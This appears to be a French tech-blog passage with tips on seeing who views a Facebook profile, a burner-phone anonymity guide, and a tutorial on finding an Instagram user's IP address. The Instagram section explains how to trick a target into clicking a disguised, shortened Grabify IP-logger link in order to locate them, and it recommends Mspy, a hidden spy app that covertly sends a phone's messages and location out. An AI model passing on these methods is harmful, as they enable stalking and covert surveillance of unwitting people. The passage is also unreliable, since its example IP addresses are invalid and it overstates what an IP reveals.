Passez en revue les résultats qui s’affichent : les 10 à 20 premiers amis de cette liste sont les personnes avec qui vous avez les interactions les plus fréquentes, ce qui signifie qu’elles visitent votre profil plus souvent que les autres personnes.

Considérez chacun de vos meilleurs amis. Si vous y voyez, dans le haut des résultats, une personne avec qui vous ne faites pas d’effort pour interagir, c’est probablement que c’est elle qui pousse l’algorithme à vous classer en tant qu’ami et donc, c’est qu’elle regarde votre page très souvent.

La suggestion d’amis sur votre profil Facebook

Regardez aussi attentivement vos suggestions d’amis. Si vous recevez une notification Facebook vous invitant à ajouter certaines personnes, les personnes en question sont très probablement les amis d’un (ou plusieurs) de vos visiteurs les plus fréquents.


B/ L’extension Flatbook pour Google Chrome

Pouvez-vous vraiment voir qui a consulté votre profil sur Facebook ? Si vous utilisez le navigateur Google Chrome et l’extension Flatbook, c’est possible (elle ne fonctionnera pas avec Firefox par exemple).

  • Tout d’abord, installez l’extension Flatbook sur votre navigateur Google Chrome. Tapez sur l’option Ajouter à Chrome et elle s’installera automatiquement.
  • Ensuite, connectez-vous à votre compte Facebook et tapez sur l’icône de l’extension Flatbook disponible dans le coin supérieur droit de l’écran.
  • Sélectionnez l’option Visiteurs du profil et vous trouverez les 20 personnes qui ont visité votre profil plusieurs fois.

C/ La méthode du code source de votre profil

Edit : La méthode livrée ci-dessous a fonctionné durant un certain moment mais d’après mes lecteurs, elle ne fonctionnerait plus aujourd’hui. Je la laisse donc à titre purement indicatif.

Facebook ne propose pas de trouver les personnes qui consultent votre profil, mais nous pouvons le faire manuellement. Ne croyez pas les applications dans Facebook qui donnent des informations sur les vues de profil: toutes sont du spam. Elles peuvent se propager comme un virus dans votre ordinateur. Suivez les instructions ci-dessous pour trouver ceux qui consultent votre profil Facebook:

a/ Choisissez et ouvrez le navigateur de votre choix, celui dont vous avez l’habitude et qui vous permet de voir le code source des pages. Connectez-vous à votre compte Facebook et examinez son code source en cliquant droit sur votre profil.

b/ Si vous utilisez Google Chrome, il vous sera facile de connaître le code source de votre compte Facebook: par un simple clic droit vous verrez apparaître l’option (voir l’impression d’écran plus bas) ou par le raccourci control+U (ce raccourci marche aussi sous Firefox et Opera).

c/ La page source de votre compte Facebook ressemblera à la capture d’écran ci-dessous.

d/ Dans le code source de la page, cherchez le mot “FriendsList“. Pour ce faire, appuyez sur les boutons contrôle+F : un champ de recherche apparaît, rentrez “FriendList” sans les guillemets et appuyez sur Entrée. Vous pouvez aussi faire une recherche sur le mot ChatFriendsList.

e/ En-dessous de “FriendsList”, vous observez une série d’une cinquantaine de suites de numéros : ce sont les 50 dernières personnes qui ont consulté votre profil Facebook plusieurs fois! Prenez un de ces numéros et collez-le dans votre barre d’urls après https://facebook/ : après avoir validé, vous tomberez sur le profil concerné. C’est magique!

Collez le numéro comme dans l’exemple ci-dessous :

→ Nota Bene : Après quelques essais, il apparaîtrait que ces numéros correspondent aux personnes avec qui vous avez interagi le plus souvent. Bien qu’il y ait une chance qu’elles aient consulté votre profil ces derniers temps, il est tout aussi probable que vous ayez eu avec elles une conversation dans Messenger ou qu’elles aient commenté un de vos messages récemment. Une personne visitant votre profil Facebook pour la première fois au hasard n’apparaîtrait pas dans cette liste… Mais si vous faîtes l’essai, donnez-nous le résultat dans les commentaires ci-dessous et nous l’incluerons dans cet article !


D/ L’extension pour Chrome “Social Profile View Notification”

Comme son nom l’indique, cette méthode implique que vous surfiez sur internet et particulièrement sur Facebook à l’aide du navigateur internet Google Chrome.

C’est une façon très facile pour découvrir qui a consulté mon profil Facebook. Mais elle a un inconvénient : il faut que celui qui visite votre Facebook l’ait lui aussi installée sur son ordinateur pour que ça marche.

  • Une fois sur Chrome, rendez-vous sur la page de l’extension Social Profile View Notification
  • Cliquez sur Ajouter à Chrome pour ajouter cette extension à votre navigateur
  • Attendez que le téléchargement soit terminé
  • Cliquez sur Ajouter une extension
  • Allez sur Facebook et connectez-vous avec le compte pour savoir qui a consulté le profil Facebook
  • Une fois sur Facebook, examinez votre barre de menus : vous verrez qu’il y a une option de plus appelée “Visiteurs” qui a été ajoutée.

E/ La déduction logique

  • Ouvrez Facebook.
  • Si vous n’êtes pas connecté à Facebook, saisissez d’abord votre adresse électronique et votre mot de passe dans le coin supérieur droit de la page, puis cliquez sur Connexion.
  • Sélectionnez la zone de texte d’état. Cliquez ou touchez la zone de texte située en haut de la page du fil d’actualité. Cette zone de texte contient généralement une phrase telle que “Qu’est-ce qui vous préoccupe ?”
  • Ecrivez une news : il peut s’agir d’une blague, un fait ou une déclaration générale, mais évitez les sujets qui susciteront de fortes émotions dans votre groupe d’amis. Evitez aussi de mentionner des sujets sensibles ou partisanes. Ne marquez personne dans votre statut, car cela fausserait les résultats du test.
  • Cliquez sur Poster. Sur le mobile, c’est écrit “Partager” dans le coin supérieur droit.
  • Attendez de voir qui aime le statut. Après un certain temps (par exemple 8 heures), passez en revue le statut pour voir qui l’a aimé et, le cas échéant, notez qui a commenté le statut.
  • Répétez ce test plusieurs fois, vous voudrez au moins 5 statuts différents pour les comparer entre eux.
  • Comparez les personnes communes qui ont aimé vos statuts. Si vous avez remarqué qu’un grand nombre de ces mêmes personnes ont aimé ou commenté vos statuts Facebook à chaque fois, elles visitent probablement votre page Facebook plus souvent que les autres personnes de votre liste d’amis.

F/ Méfiez-vous des applications tierces pour voir qui a consulté votre profil

⇒ Peut-on vraiment voir qui a consulté notre profil Facebook ?

Une simple recherche sur Google vous montre qu’il existe un certain nombre d’applications tierces proposant ce service. Des applications Facebook, des extensions Chrome et des applications Android prétendent pouvoir vous avertir dès que quelqu’un consulte votre profil Facebook.

Afin d’utiliser leurs services, ces entreprises vous demandent de leur donner accès à votre profil personnel et à vos renseignements personnels, parfois même elles demandent de l’argent. Après tout, ce n’est pas tous les jours qu’on vous donne l’occasion de tromper un géant des médias sociaux et de vous en tirer avec des informations importantes sur les personnes qui accèdent à votre compte… Mais ne vous faîtes pas avoir!

⇒ Est-il rassurant d’utiliser ces applications tierces ?

Utiliser une application tierce pour contourner Facebook et découvrir qui consulte votre profil peut sembler une offre tentante. Cependant, sachez que ce n’est pas gratuit. En échange de vous laisser utiliser leurs services, ces applications veulent avoir accès à votre compte, avec l’intention de l’utiliser pour:

  • récupérer vos informations personnelles,
  • distribuer ce que la plupart des gens considéreraient comme du spam,
  • ou même infecter votre appareil avec des logiciels malveillants.

Bien sûr, aucun de ces services tiers ne peut réellement livrer ce qu’ils promettent, à savoir vous permettre de voir qui consulte votre profil sur Facebook. Il s’agit de données confidentielles que Facebook conserve de très près, et il n’y a tout simplement pas d’application ni de script qui vous permettrait de contourner ces restrictions. Les applications qui prétendent offrir cette fonctionnalité sont simplement là pour voler vos données, vous infecter avec des logiciels malveillants et vous fournir de fausses informations sans valeur réelle.

Les applications Facebook qui prétendent vous permettre de voir qui consulte votre profil, sachez qu’il s’agit d’arnaques. L’application continuera d’avoir accès à votre compte jusqu’à ce que vous la révoquiez manuellement. Assurez-vous de lui bloquer l’accès à votre compte et suivez les instructions pour supprimer les applications indésirables de votre profil Facebook.

⇒ Un autre genre d’application existe comme Mspy ou Hoverwatch. Vous les installez dans un téléphone portable que vous souhaitez espionner. Une fois installées, elles vous rappatrient sur votre compte privé les messages Facebook du téléphone, ses conversations et sa position géographique. Il s’agit là d’une application espionne utilisée pour espionner un téléphone portable.


Mes articles relatifs à Facebook :

Comment bien utiliser un Burner Phone

Un téléphone prépayé ou Burner Phone est un téléphone à usage unique, non lié à votre identité, qui peut théoriquement être utilisé pour communiquer anonymement dans des situations où les communications peuvent être surveillées. La question de savoir si l’utilisation d’un téléphone à usage unique est en soi une “bonne pratique” est sujette à débat, mais si vous avez fait le choix d’en utiliser un, il y a plusieurs choses que vous devez garder à l’esprit.

Pourquoi voudriez-vous un “burner phone” ?

Malgré tout le buzz qui entoure le nouvel iPhone, beaucoup envisagent quelque chose à l’autre bout du spectre : un téléphone portable bon marché, jetable et prépayé. D’accord, ces “burner phone”, comme on les appelle souvent, peuvent être un complément à votre coûteux smartphone plutôt qu’un remplacement, mais ces appareils présentent aussi certains avantages enviables.

→ Préservation de votre vie privée

Bien que vous puissiez penser qu’un “téléphone prépayé” est quelque chose que seul un criminel veuille utiliser pour éviter d’être suivi par les autorités – comme les trafiquants de drogue – les citoyens respectueux de la loi peuvent également apprécier la confidentialité qu’il accorde. Par exemple, vous ne voudrez peut-être pas utiliser votre numéro de téléphone principal si vous postez des articles sur un site de petites annonces ou de rencontres. Après tout, vous vous exposez à des appels ou à des messages indésirables de la part d’inconnus sur votre ligne personnelle. Au lieu de cela, lorsque les transactions sont terminées, vous pouvez simplement jeter (ou “brûler”) le téléphone temporaire. Les téléphones à prépaiement sont également appréciés pour les utilisateurs d’applications de rencontre, car vous ne voudrez sûrement pas donner votre numéro principal à quelqu’un qui ne vous plaît pas. Bien sûr, vous pouvez bloquer cette personne sur votre téléphone principal, mais il peut toujours vous contacter à partir d’un autre numéro.
Notez aussi qu’avec un téléphone de ce type, vous ne craignez pas d’être espionné de quelque façon que ce soit : keylogger, logiciel espion ou autre techique de phising, puisqu’il ne capte pas internet ni par wi-fi ni par 4G.
Les burner phone peuvent être achetés en liquide et sans contrat, et les fournisseurs qui vendent ces appareils ne suivent pas les données personnelles. L’anonymat n’est toutefois pas totalement garanti, car les téléphones prépayés peuvent toujours être localisés sur un réseau cellulaire grâce au numéro de téléphone temporaire, ou enregistrés par votre opérateur chaque fois que vous appelez. C’est pourquoi les bonnes pratiques que nous écrivons ci-dessous vous permettront de les utiliser au mieux pour optimiser votre invisibilité.

→ Autres avantages des Burner Phone

Outre le respect de la vie privée, il existe d’autres raisons pour lesquelles vous pouvez envisager un téléphone à prépaiement : En cas d’urgence : Chaque téléphone portable doit pouvoir composer le 112 (numéro d’urgence), même si vous n’êtes pas abonné à un opérateur. Vous n’avez même pas besoin d’une carte SIM. C’est une utilisation pratique pour un Burner Phone bon marché. Jetez-le dans votre boîte à gants et vous saurez qu’il est là, au cas où. Téléphone de secours : Bien que certains téléphones prépayés aient des fonctions avancées, la plupart sont des appareils sans fil utilisés uniquement pour les appels ou les SMS. Comme la plupart de ces appareils n’ont pas de grand écran, ni 4G, ni GPS, ils possèdent une autonomie beaucoup plus longue qu’un smartphone haut de gamme. C’est l’idéal comme téléphone de secours si la batterie de votre appareil principal s’épuise. Faible coût : Le prix est également un bon facteur de motivation. Plutôt que de dépenser 800 euros pour le dernier iOS ou Android haut de gamme, les téléphones prépayés ne coûtent que 20 euros pour les moins chers comprenant un clavier physique complet ou un téléphone à clapet compact. Bien que ce téléphone n’aura pas accès aux données, de nombreux réseaux sociaux comme Twitter et Facebook ont une option SMS qui vous permet d’être informé des mises à jour par SMS.

Les meilleures pratiques pour utiliser un burner phone

Un Burner Phone est en général utilisé comme un téléphone à usage unique acheté spécifiquement pour des communications anonymes. Il est considéré comme un moyen de communication clandestin, et son efficacité repose sur des pratiques de sécurité sans faille.

→ Procurez-vous votre Burner Phone avec soin

Vous voulez que votre téléphone soit intraçable. Cela signifie que vous devez le payer en liquide ; n’utilisez pas de carte bancaire. Posez-vous la question suivante : y a-t-il des caméras de surveillance dans ou autour de l’endroit où vous l’achetez ?
  • N’apportez pas votre téléphone personnel à l’endroit où vous achetez votre Burner.
  • Envisagez de vous rendre à pied ou à vélo à l’endroit où vous l’achetez.
  • Couvrez vos caractéristiques facilement identifiables avec des vêtements ou du maquillage.
  • N’achetez pas un burner phone dans un endroit que vous fréquentez régulièrement, où les gens vous reconnaîtront.

→ Les Burner Phone ne doivent appeler que d’autres Burner Phone

L’utilisation d’un téléphone à prépaiement pour parler à un téléphone normal laisse une trace entre vous et votre interlocuteur. Pour la sécurité de tous les membres de votre cercle de communication, les Burner Phone ne doivent être utilisés que pour contacter d’autres téléphones à prépaiement, afin que vos relations ne compromettent pas votre sécurité. Il existe plusieurs façons d’organiser cela, mais la meilleure est probablement de mémoriser votre propre numéro et de le partager en personne avec la personne avec laquelle vous voulez communiquer. Convenez à l’avance d’un SMS inoffensif qu’elle vous enverra, de sorte que lorsque vous allumerez votre téléphone, vous puissiez l’identifier en vous basant sur le message. Il est inutile de répondre au SMS, sauf si vous avez des informations importantes à communiquer. N’oubliez pas que vous devez garder vos contacts et vos communications aussi clairsemés que possible afin de minimiser les risques potentiels pour votre sécurité.

→ N’allumez jamais votre Burner Phone à la maison

Comme les téléphones portables enregistrent et transmettent des données de localisation, vous ne devez jamais allumer un burner phone dans un endroit où vous pouvez être pisté. Cela s’applique à votre domicile, mais aussi à votre lieu de travail, à votre école, à votre salle de sport et à tout autre endroit que vous visitez fréquemment.

→ N’allumez jamais votre burner phone à proximité de votre téléphone principal

Comme expliqué ci-dessus, les téléphones sont essentiellement des appareils de repérage dotés de fonctions et de caractéristiques supplémentaires. C’est pourquoi vous ne devez jamais allumer un burner phone à proximité de votre “vrai” téléphone. Le fait de faire un lien géographique entre votre appareil de communication anonyme et votre téléphone d’identification personnelle est le meilleur moyen de vous faire identifier. Cela signifie qu’à moins que vous ne soyez dans une grande foule, vous ne devez pas allumer votre téléphone à proximité des Burner Phone de vos contacts.

→ Ne vous identifiez pas, ni aucun de vos contacts, par votre nom

Étant donné que le but de l’utilisation d’un téléphone à prépaiement est de préserver votre anonymat et celui des personnes qui vous entourent, le fait de vous identifier ou d’identifier vos contacts par leur nom compromet cet objectif. N’utilisez pas le nom légal de qui que ce soit lorsque vous communiquez via un burner, et n’utilisez pas non plus des pseudonymes que vous avez déjà utilisés ailleurs. Si vous devez utiliser des identifiants, ceux-ci doivent être uniques, établis à l’avance et non réutilisés. Envisagez d’utiliser une phrase “mot de passe” inoffensive pour communiquer, plutôt que d’utiliser un nom. Utilisez plutôt “Hé, tu veux aller déjeuner mardi ?” plutôt que “Hé, c’est l’écureuil secret”. Cela permet également d’être sûr que votre interlocuteur est le bon. Par exemple, vous saurez que le contact que vous avez l’intention de joindre est le bon s’il répond à votre invitation à un brunch en disant : “Bien sûr, laissez-moi vérifier mon calendrier et je vous rappellerai”. En plus, cette pratique d’authentification permet d’utiliser un code de contrainte: “Je ne peux pas venir au brunch, j’ai un conflit de cours de yoga”, qui peut être utilisé si la personne avec laquelle vous essayez de vous coordonner a eu des problèmes.

→ Méfiez-vous des IMSI Catcher

Si vous voulez que vos phrases d’authentification et de contrainte restent aussi inoffensives que possible, c’est parce que les espions du monde entier utilisent de plus en plus des IMSI Catcher, également appelés “Stingrays”, pour capturer les messages écrits et les appels téléphoniques à leur portée. Ces dispositifs se font passer pour des tours de téléphonie cellulaire, interceptant et enregistrant vos communications, puis les transmettant à de vraies tours de téléphonie cellulaire afin que vos contacts les reçoivent également. Pour cette raison, utiliser votre Burner pour envoyer un SMS du genre “Hé, tu es à la manifestation?” serait complètement idiot. Dans des circonstances normales, l’utilisation de messageries cryptées telles que Signal peut contourner assez efficacement l’utilisation des Stingrays, mais comme les Burner Phone n’ont généralement pas la capacité d’envoyer des messages cryptés, il est nécessaire de faire attention à ce que vous dîtes.

→ Les Burner Phone sont à usage unique

Les Burner Phone sont destinés à être utilisés une fois, puis sont considérés comme “jetables”. Il y a de nombreuses raisons à cela, mais la principale est que vous ne voulez pas que vos actions clandestines soient liées à d’autres. Si le même téléphone “jetable” commence à apparaître lors des mêmes événements, des personnes feront le rapprochement et établiront des profils. Cela signifie que si ce que vous faîtes nécessite vraiment un téléphone à prépaiement, alors cela nécessite un burner phone propre et neuf à chaque fois. Ne laissez pas une mesure de sécurité bâclée réduire à néant tous vos efforts.

→ Ne supposez jamais que les Burner Phone sont “sûrs” ou “sécurisés”

Pour que votre Burner Phone préserve votre vie privée, tous les acteurs de votre cercle de communication doit entretenir cette sécurité. Une utilisation sûre des téléphones à prépaiement exige des précautions adéquates et une bonne hygiène de la part de tous les membres du réseau : une défaillance d’une personne peut compromettre tout le monde. Par conséquent, assurez-vous que toutes les personnes avec lesquelles vous communiquez sont sur la même longueur d’onde en ce qui concerne l’utilisation des burner phone, et envisagez toujours la négligence d’un membre de votre équipe.
Profitez-en pour faire attention à vos communications même lorsque vous utilisez des téléphones normaux. Prenez vous-même la responsabilité de votre propre sécurité, et n’hésitez pas à effacer et à vous débarrasser de votre Burner Phone si nécessaire.

Conclusion

Un Burner Phone est un téléphone portable bon marché conçu pour un usage temporaire, après quoi il peut être mis au rebut. Il est acheté avec des minutes prépayées et aucun contrat. Seules les personnes ayant un besoin extrême d’intimité sont susceptibles d’utiliser de véritables burner. De nombreuses personnes se sont familiarisées avec ce concept en regardant Sur Ecoute, une série télévisée populaire dans laquelle des dealers de drogue en utilisaient pour communiquer, puis s’en débarrassaient pour éviter que la police ne les suive. Dans cette série, payer les téléphones en liquide plutôt qu’avec une carte de crédit et n’avoir aucun contrat avec un fournisseur signifiait qu’il n’y avait aucune trace de connexion entre l’utilisateur et son numéro de téléphone. Si l’utilisateur soupçonnait que le numéro était compromis, il pouvait simplement s’en débarrasser et en acheter un nouveau qui porterait un nouveau numéro. De nos jours, la plupart des personnes respectueuses de la loi possèdent des smartphones, et les numéros de téléphone portable sont de plus en plus utilisés comme des identificateurs uniques reliant les données de l’utilisateur à travers de multiples bases de données. Les numéros de téléphone n’étant pas soumis aux mêmes exigences de confidentialité que les numéros de sécurité sociale ou de carte bancaire, ils ont tendance à être partagés assez facilement. Par conséquent, la confidentialité des numéros de téléphone portable est un problème de sécurité croissant et les burner phone séduisent de plus en plus.

Comment trouver l’adresse IP d’un utilisateur Instagram ?

De nos jours, internet fait partie intégrante de notre vie quotidienne. C’est une extension de notre monde physique et, en tant que tel, il apporte des responsabilités dont nous ne sommes pas toujours conscients.

Une des choses que nous considérons rarement, c’est que notre existence en ligne expose notre identité en ligne. Rien de ce que nous faisons en ligne n’est sans conséquence. Et ces conséquences sont associées à notre identité en ligne, autrement dit, à notre adresse IP.

Lorsque nous publions des commentaires et partageons sur Facebook, Twitter et Instagram, tout fabriquons une sorte de “dossier” sur nous. La plupart d’entre nous le faisons de manière transparente, mais il y a aussi des gens qui le font de manière anonyme, même si l’anonymat en ligne n’est pas vraiment possible.

Nous allons aborder les points suivants : 

  • Pourquoi essayer de chercher l’adresse IP de quelqu’un sur Instagram ?
  • Comment utiliser Grabify ?
  • Rechercher l’adresse IP d’instagram sur PC grâce à l’invite de commandes
  • Comment obtenir l’adresse IP de quelqu’un à partir de sa messagerie?
  • Comment tracer la localisation de quelqu’un et son compte Instagram

Pourquoi essayer de chercher l’adresse IP de quelqu’un sur Instagram ?

Il y a de nombreuses raisons à cela, comme le harcèlement en ligne, la fraude et d’autres comportements malveillants. Il y a aussi des cas où quelqu’un crée un faux profil juste pour faire une transaction, acheter des baskets en édition limitée, etc. Dans ces cas et de nombreux autres, il est très utile de connaître l’IP réelle qui se cache derrière un profil Instagram.

L’adresse IP est numérique et se compose de 4 chiffres, chacun séparé par un point. Par exemple 67.473.313.68.

En utilisant les techniques de traçage d’adresse IP données ici, vous pourrez trouver facilement l’adresse IP de n’importe quel utilisateur ou profil Instagram.


COMMENT TROUVER L’ADRESSE IP INSTAGRAM

Vous seriez étonné si vous saviez ce que vous pouvez découvrir sur les gens quand vous trouvez leur adresse IP. Lorsque vous connaissez leur adresse IP, vous n’êtes plus qu’à un pas de connaître leur emplacement, leur nom et d’autres renseignements personnels.

Lorsque vous connaissez toutes ces informations, vous pouvez bloquer l’accès de quelqu’un à votre forum, à votre site, à votre contenu en ligne.

Il existe plusieurs sites Web, tels que IP Logger et Grabify IP Logger, qui peuvent vous aider à le faire rapidement et facilement.

Voici les étapes que vous devez suivre si vous voulez savoir comment obtenir l’adresse IP d’un compte Instagram.

→ Mode d’emploi

  • Allez sur le profil de la personne dont vous voulez connaître l’adresse IP.
  • Cliquez sur les trois points à côté de son nom d’utilisateur.
  • Copiez l’URL de son profil.
  • Allez sur Grabify IP Logger, IP Logger ou autres sites similaires.
  • Collez le lien dans la barre et cliquez sur “Créer une URL”. Lorsque la page de résultats s’ouvre, vous verrez un nouveau lien généré.
  • Facultatif : Si le nouveau lien est trop long, assurez-vous de le raccourcir avec Bitly.
  • Discutez avec la personne dont vous voulez connaître l’adresse IP et envoyez-lui le lien (raccourci ou pas) que vous venez de créer. Par exemple en lui disant que vous voulez qu’il voie une belle photo sur ce lien.
  • Lorsqu’il clique dessus, rafraîchissez la page du site de l’enregistreur que vous avez utilisé (Grabify par exemple) et vous obtiendrez l’adresse IP de la personne au bas de la page.
  • Si vous utilisez Facebook ou Instagram pour discuter avec la personne, vous devrez activer l’option ” Masquer les Bots ” afin d’obtenir son adresse IP authentique.

Envoyer un lien avec Grabify

Si tout ce que vous vouliez , c’est l’adresse IP de la personne, c’est fini. Si vous voulez en savoir plus sur la personne, suivez les étapes suivantes.

  • Allez sur IP Tracker ou autre site similaire.
  • Cliquez sur l’option IP Tracker.
  • Collez l’adresse IP que vous avez obtenue sur l’un des sites d’enregistrement IP et tracez-la.
  • Vous connaîtrez le nom, l’emplacement, l’indicatif régional, le FAI et d’autres renseignements détaillés sur la personne.

Avec ces étapes simples, vous savez comment obtenir l’adresse IP d’un compte Instagram. Au début, ça peut sembler être de l’espionnage. Mais parfois, c’est la seule option que vous avez si quelqu’un vous harcèle sur Instagram.

→ Comment utiliser Grabify plus précisément ?

  • New Url : Il s’agit de l’URL spécialement conçue que vous devez envoyer à votre utilisateur ciblé.
  • Tracking code : Notez ce code car vous en aurez besoin à l’avenir pour accéder à vos données de suivi à moins que vous gardiez votre onglet ouvert.
  • Other Links : Dans ce champ, vous pouvez créer un lien raccourci de l’URL. Cela permet que l’utilisateur ne sache pas que ce lien sert à le tracer en remontant jusqu’à Grabify.

Raccourcisseurs sur Grabify :

Une fois que l’utilisateur ciblé clique sur le lien, son adresse IP est enregistrée sur le serveur de Grabify. Pour vérifier l’IP enregistrée, entrez votre “Code de suivi” et affichez la page d’information du lien. A l’intérieur de cette page d’information, les adresses IP enregistrées seront listées dans la section RÉSULTATS, voyez l’impression d’écran :

Une fois que vous avez l’adresse IP, vous pouvez utiliser le service Géolocalisation pour trouver l’emplacement exact de l’utilisateur Instagram, c’est-à-dire l’adresse IP du compte Instagram suivi.


Comment trouver l’adresse IP à partir du site Instagram sur PC ?

Si vous utilisez Windows, cliquez sur “Démarrer”, allez dans “Tous les programmes” puis sur “Accessoires”. Vous obtiendrez une invite de commande où vous pouvez pinger l’URL du site dont vous voulez trouver l’adresse IP (pour la trouver, tapez simplement “cmd” dans la barre “exécuter” de Windows). Cela enverra un signal à l’URL qui vous intéresse. Vous pouvez également savoir combien de temps il faut pour l’aller-retour.

→ Recherche de l’adresse IP d’Instagram sur PC

Suivez le mode d’emploi :

Tapez simplement “ping URL” – où l’URL est www.instagram.com ou www.facebook.com. Maintenant, cliquez sur “entrer”. Vous obtiendrez l’adresse IP apparaissant à côté du nom du site Web, ainsi que le temps en millisecondes qu’il faut pour l’ensemble de l’opération.


Comment obtenir l’adresse IP de quelqu’un à partir de son courriel ?

Pour trouver l’adresse IP d’un email qui vous a été envoyé par Instagram, ouvrez d’abord votre client de messagerie. Regardez les en-têtes du message.

  • Si vous utilisez un Mac, cliquez sur Affichage > Message > Tous les en-têtes.
  • Si vous utilisez un PC, cliquez sur Options > boîte de dialogue > Options de message (Propriétés) > En-têtes internet.

Juste à côté de la section “Réception”, cherchez quelque chose comme “from…” suivi de l’adresse IP. Sélectionnez l’adresse IP, disons 67.336.412.534 et copiez-la dans le presse-papiers.

Si vous utilisez Windows, répétez la méthode que nous avons utilisée précédemment pour obtenir l’Invite de commandes. La seule différence, c’est qu’au lieu de pinger l’adresse, nous allons utiliser le contrôle whois.

Tapez simplement whois 67.336.412.534 à l’invite de commande et cliquez sur Entrée.

Si vous ne voulez pas utiliser votre propre ordinateur pour trouver les informations whois ou si vous n’avez pas la permission de le faire, vous pouvez utiliser un service en ligne tel que https://ip-lookup.net/ pour trouver les informations whois.


Tracer la localisation de quelqu’un et son compte Instagram

Si vous pouvez installer une application téléphonique dans le téléphone ciblé, pensez aussi à la solution Mspy. Cette application est une sorte de contrôle parental amélioré qui est capable de se masquer sur le téléphone (masquer l’icône).

Une fois installée, elle renverra sur une interface sécurisée les messages échangés sur Instagram et la localisation du téléphone portable en toutes circonstances. Cette application est premium : une fois que vous l’avez achetée, vous obtenez un code et un mot de passe. Lorsque vous vous connecterez sur son site web depuis votre ordinateur ou votre portable, vous aurez accès à toutes les informations enregistrées à propos du téléphone ciblé, y compris les discussions sur les réseaux sociaux. 

A lire aussi sur Untelephone.com